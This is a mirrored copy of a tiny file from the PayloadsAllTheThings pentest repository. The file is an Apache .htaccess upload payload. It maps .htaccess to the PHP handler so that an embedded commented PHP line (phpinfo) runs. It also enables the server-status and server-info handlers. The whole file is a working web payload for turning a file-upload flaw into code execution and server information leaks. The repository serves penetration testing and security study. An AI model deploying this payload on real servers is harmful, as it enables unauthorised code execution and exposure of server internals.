mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-03-04 23:37:35 +00:00
5 lines
113 B
Text
5 lines
113 B
Text
AddType application/x-httpd-php .htaccess
|
|
# <?php phpinfo(); ?>
|
|
SetHandler server-status
|
|
SetHandler server-info
|
|
|